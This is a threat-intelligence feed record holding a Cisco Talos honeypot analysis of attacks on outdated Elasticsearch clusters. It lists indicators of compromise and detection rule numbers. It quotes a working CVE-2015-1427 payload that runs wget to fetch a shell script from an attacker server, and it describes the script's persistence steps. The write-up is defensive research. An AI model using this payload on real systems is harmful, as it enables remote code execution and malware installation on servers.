"MYHACK58:62201892387", "href": "http://www.myhack58.com/Article/html/3/62/2018/92387.htm", "title": "Crypto currency mining machine using Elasticsearch vulnerability propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2019-03-01T16:16:02", "bulletinFamily": "blog", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "modified": "2019-03-01T15:56:50", "published": "2019-02-26T10:56:00", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
